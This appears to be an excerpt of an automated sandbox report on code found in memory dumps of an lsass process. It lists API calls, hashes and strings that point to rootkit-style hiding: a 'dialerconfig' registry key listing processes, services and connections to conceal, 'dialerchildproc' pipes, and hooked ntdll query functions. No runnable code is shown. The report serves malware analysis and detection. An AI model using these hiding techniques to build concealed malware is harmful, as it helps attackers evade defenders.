                                                                                                                            • Instruction Fuzzy Hash: 36F090D8311E884DFF545762B51F39592905B88BC0F0C92374D0F86FC2EE1CCC818620
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: e52bf68b31deb3b75f098f43a4d7db34dffa5d04e032c03eec0775e701bb4258
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: B0B17CA2210E908EEB668F25E44C7A963A5F744BD4F64511BEE0E67F94DF38CC81C740
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: 7139f5732e3396e9ce4a67c786d1cdd1f51a6eb8d408f2f6df613c620b1bfdca
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: B9B18DA2220E988EEB648F25E44D7A963A5F744BD4F44901BEE4E57F98DB38CC81C740
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: 2c2ab99ae258e3bf0c478ecf6a228b1e325b8175137ff9dca730b23599cdb4cd
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: 97311AB2205E808AEB609F64F8887ED7364F785788F44442ADA4E57B95EF38CA48C710
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: a7c6be586ec6daad7d7cccc920bb91253376a8a92bbddd5b54f1ec8431f2a026
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: 083109B2215F848AEB609F61F8987ED6364F784794F44442BDA4E57A98EF38CA48C710
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: 58eb25c51ad3c38e9823b02ddc7af6a39282a3411e5fadb664d5dd80ce479239
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: BB315D76214F808AEB60CF25F88839E73A4F789794F500126EA9E57B99DF3CC945CB00
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: 71c1c438ad0520bc105e9bc1bd8316424f0db28fcde3cf29310aaddd8912c456
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: A6314E72214F848AEB608F25F84939E73A4F7897A4F504127EA9E47B54DF3CC945CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: 1e1e47678fa7c4b781087d3b5f8b15c943a24ad0d42d65cabc9df2231e8d4def
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: 1B71A5A6710E918AEB119F76F89CA9923B4FB84BC8F405112DE4E57F69EF2CC844C744

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 293 2d6f1571628-2d6f15716ba GetProcessHeap call 2d6f1586168 call 2d6f1571268 call 2d6f1571000 call 2d6f1571268 * 3 call 2d6f1571000 * 3 RegOpenKeyExW 312 2d6f15718a6-2d6f15718b0 293->312 313 2d6f15716c0-2d6f15716e7 RegOpenKeyExW 293->313 314 2d6f15716e9-2d6f15716ed 313->314 315 2d6f15716ff-2d6f1571721 RegOpenKeyExW 313->315 318 2d6f15716f0 call 2d6f15712bc 314->318 316 2d6f157173a-2d6f157175c RegOpenKeyExW 315->316 317 2d6f1571723-2d6f1571727 315->317 320 2d6f1571775-2d6f1571797 RegOpenKeyExW 316->320 321 2d6f157175e-2d6f1571762 316->321 319 2d6f157172b call 2d6f157104c 317->319 322 2d6f15716f5-2d6f15716f9 RegCloseKey 318->322 323 2d6f1571730-2d6f1571734 RegCloseKey 319->323 325 2d6f1571799-2d6f157179d 320->325 326 2d6f15717b0-2d6f15717d2 RegOpenKeyExW 320->326 324 2d6f1571766 call 2d6f15712bc 321->324 322->315 323->316 327 2d6f157176b-2d6f157176f RegCloseKey 324->327 328 2d6f15717a1 call 2d6f15712bc 325->328 329 2d6f15717eb-2d6f157180d RegOpenKeyExW 326->329 330 2d6f15717d4-2d6f15717d8 326->330 327->320 333 2d6f15717a6-2d6f15717aa RegCloseKey 328->333 331 2d6f1571826-2d6f1571848 RegOpenKeyExW 329->331 332 2d6f157180f-2d6f1571813 329->332 334 2d6f15717dc call 2d6f15712bc 330->334 336 2d6f157184a-2d6f157184e 331->336 337 2d6f1571861-2d6f1571883 RegOpenKeyExW 331->337 335 2d6f1571817 call 2d6f157104c 332->335 333->326 338 2d6f15717e1-2d6f15717e5 RegCloseKey 334->338 339 2d6f157181c-2d6f1571820 RegCloseKey 335->339 340 2d6f1571852 call 2d6f157104c 336->340 341 2d6f157189c-2d6f15718a0 RegCloseKey 337->341 342 2d6f1571885-2d6f1571889 337->342 338->329 339->331 343 2d6f1571857-2d6f157185b RegCloseKey 340->343 341->312 344 2d6f157188d call 2d6f157104c 342->344 343->337 345 2d6f1571892-2d6f1571896 RegCloseKey 344->345 345->341
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction ID: 3325cba9d1b967ae01adee52ee0ae7b01beceab54b901428531b2005536fff07
                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                            • Instruction Fuzzy Hash: A971E5A6324E148AEB209F66F89D69963B4FB84BD8F005113DE4F47E69EE38C845C744

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction ID: 5fb3b21df960b81225b638196f68b2da2c963b60e6c4826c36aa05b26c7c4fc2
                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction Fuzzy Hash: B95115B6200B848AEB55CF62F54C35AA7A1F789FD9F144126DE4A07B58DF3CD849CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction ID: 718f7aadee3d6f7050338ef8a03f988c86b4b4f2c6465c432f63d4a1cf27d5bc
                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction Fuzzy Hash: 865128B6214B848BEB54CF62F54D35A77A2F789FD9F048126DA4A07B59DF3CC8498B00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: acd4e2c9eb3dd1a9bb1b7a25fe6521af63330346e6cf64fc31cecd724e9f3874
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: C83162E9110E8AA8EE06EFA5F8AE6D46321B7143C4F905017981F23D75DF7C8E4AC760

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: 7647314fc5b6d40601e2c34ec03d1841272cc1e0078bda06571078b55a98c4b7
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: 173192E4124E4AA9FA04EBA5F86EAE46360B7143D5FC08027D45F12D65DF7C8E4EC790

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 442 2d6f14e6910-2d6f14e6916 443 2d6f14e6951-2d6f14e695b 442->443 444 2d6f14e6918-2d6f14e691b 442->444 445 2d6f14e6a78-2d6f14e6a8d 443->445 446 2d6f14e6945-2d6f14e6984 call 2d6f14e6fc0 444->446 447 2d6f14e691d-2d6f14e6920 444->447 451 2d6f14e6a8f 445->451 452 2d6f14e6a9c-2d6f14e6ab6 call 2d6f14e6e54 445->452 464 2d6f14e6a52 446->464 465 2d6f14e698a-2d6f14e699f call 2d6f14e6e54 446->465 449 2d6f14e6922-2d6f14e6925 447->449 450 2d6f14e6938 __scrt_dllmain_crt_thread_attach 447->450 455 2d6f14e6931-2d6f14e6936 call 2d6f14e6f04 449->455 456 2d6f14e6927-2d6f14e6930 449->456 453 2d6f14e693d-2d6f14e6944 450->453 457 2d6f14e6a91-2d6f14e6a9b 451->457 462 2d6f14e6aef-2d6f14e6b20 call 2d6f14e7190 452->462 463 2d6f14e6ab8-2d6f14e6aed call 2d6f14e6f7c call 2d6f14e6e1c call 2d6f14e7318 call 2d6f14e7130 call 2d6f14e7154 call 2d6f14e6fac 452->463 455->453 474 2d6f14e6b22-2d6f14e6b28 462->474 475 2d6f14e6b31-2d6f14e6b37 462->475 463->457 468 2d6f14e6a54-2d6f14e6a69 464->468 477 2d6f14e69a5-2d6f14e69b6 call 2d6f14e6ec4 465->477 478 2d6f14e6a6a-2d6f14e6a77 call 2d6f14e7190 465->478 474->475 479 2d6f14e6b2a-2d6f14e6b2c 474->479 480 2d6f14e6b7e-2d6f14e6b94 call 2d6f14e268c 475->480 481 2d6f14e6b39-2d6f14e6b43 475->481 495 2d6f14e69b8-2d6f14e69dc call 2d6f14e72dc call 2d6f14e6e0c call 2d6f14e6e38 call 2d6f14eac0c 477->495 496 2d6f14e6a07-2d6f14e6a11 call 2d6f14e7130 477->496 478->445 485 2d6f14e6c1f-2d6f14e6c2c 479->485 503 2d6f14e6bcc-2d6f14e6bce 480->503 504 2d6f14e6b96-2d6f14e6b98 480->504 486 2d6f14e6b45-2d6f14e6b4d 481->486 487 2d6f14e6b4f-2d6f14e6b5d call 2d6f14f5780 481->487 492 2d6f14e6b63-2d6f14e6b78 call 2d6f14e6910 486->492 487->492 508 2d6f14e6c15-2d6f14e6c1d 487->508 492->480 492->508 495->496 545 2d6f14e69de-2d6f14e69e5 __scrt_dllmain_after_initialize_c 495->545 496->464 518 2d6f14e6a13-2d6f14e6a1f call 2d6f14e7180 496->518 506 2d6f14e6bd5-2d6f14e6bea call 2d6f14e6910 503->506 507 2d6f14e6bd0-2d6f14e6bd3 503->507 504->503 505 2d6f14e6b9a-2d6f14e6bbc call 2d6f14e268c call 2d6f14e6a78 504->505 505->503 538 2d6f14e6bbe-2d6f14e6bc6 call 2d6f14f5780 505->538 506->508 526 2d6f14e6bec-2d6f14e6bf6 506->526 507->506 507->508 508->485 529 2d6f14e6a45-2d6f14e6a50 518->529 530 2d6f14e6a21-2d6f14e6a2b call 2d6f14e7098 518->530 533 2d6f14e6c01-2d6f14e6c11 call 2d6f14f5780 526->533 534 2d6f14e6bf8-2d6f14e6bff 526->534 529->468 530->529 544 2d6f14e6a2d-2d6f14e6a3b 530->544 533->508 534->508 538->503 544->529 545->496 546 2d6f14e69e7-2d6f14e6a04 call 2d6f14eabc8 545->546 546->496
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: a6791069ef224389268787c1cde3096a7f5d96d964d78a2d6507250396e19ec1
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: A681EF61A00E018EFA54EB66B44D3A966E1ABC57C0F54812B9A1B47F9FDF3CCE458B00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 000002D6F151CE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 000002D6F151CED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,000002D6F151ECCC,?,?,?,?,000002D6F151BF9F,?,?,?,?,?,000002D6F1517AB0), ref: 000002D6F151CF2C
                                                                                                                              • Part of subcall function 000002D6F151D6CC: HeapAlloc.KERNEL32 ref: 000002D6F151D721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF54
                                                                                                                              • Part of subcall function 000002D6F151D744: HeapFree.KERNEL32 ref: 000002D6F151D75A
                                                                                                                              • Part of subcall function 000002D6F151D744: GetLastError.KERNEL32 ref: 000002D6F151D764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520A6B,?,?,?,000002D6F152045C,?,?,?,000002D6F151C84F), ref: 000002D6F151CF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: cbe95e8add907aa0b2c73cf7f4231efe5140574644f478dc5db001f93a5baefd
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: C4410EE0301E444EFE6BAF35755E36962429B447F0F240B27A93F6AED6DE2DDC418600
                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 000002D6F157CE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 000002D6F157CED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,000002D6F157ECCC,?,?,?,?,000002D6F157BF9F,?,?,?,?,?,000002D6F1577AB0), ref: 000002D6F157CF2C
                                                                                                                              • Part of subcall function 000002D6F157D6CC: HeapAlloc.KERNEL32 ref: 000002D6F157D721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF54
                                                                                                                              • Part of subcall function 000002D6F157D744: HeapFree.KERNEL32 ref: 000002D6F157D75A
                                                                                                                              • Part of subcall function 000002D6F157D744: GetLastError.KERNEL32 ref: 000002D6F157D764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1580A6B,?,?,?,000002D6F158045C,?,?,?,000002D6F157C84F), ref: 000002D6F157CF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: 21ae960c7e4dd132fac355595f541caa38080038c1a896d72f44f5f893906091
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: 3B412BE0305E4D4EFF69A735755F76962825B447F0F548B27A83F4AEEADE2C9C018201
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: 16cc91b0a522ba52fd30a106300581a7bfe1bf7e397ef6e488c8d9df07b3eb6a
                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: 44212CB6614B8086FB108B25F44C76A77A1F789BE5F504216EA5E03FA8DF7CC949CB00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: 3bee671e8776f551583a9937c8cd74961dd71f46eddd50b45fa1b45f6358f85f
